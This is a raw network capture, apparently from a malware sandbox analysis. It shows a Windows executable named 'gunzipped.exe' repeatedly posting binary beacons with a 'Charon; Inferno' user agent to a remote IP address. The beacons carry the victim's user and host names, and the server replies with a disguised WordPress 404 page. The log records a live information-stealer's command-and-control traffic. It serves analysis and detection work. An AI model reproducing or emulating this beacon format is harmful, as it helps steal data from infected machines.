Apr 17, 2024 03:17:39.132791042 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:38 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:39.132837057 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:39.132874966 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:39.132913113 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:39.132955074 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:39.132993937 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:39.133033991 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:39.133074045 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:39.133114100 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:39.133152962 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49743	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:39.820704937 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:40.024130106 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:40.943911076 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:39 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:40.943933964 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:40.943955898 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:40.943974972 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:40.943998098 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:40.944015026 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:40.944034100 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:40.944051027 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:40.944067955 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:40.944088936 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49744	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:41.291392088 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:41.499365091 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:42.471524000 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:41 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 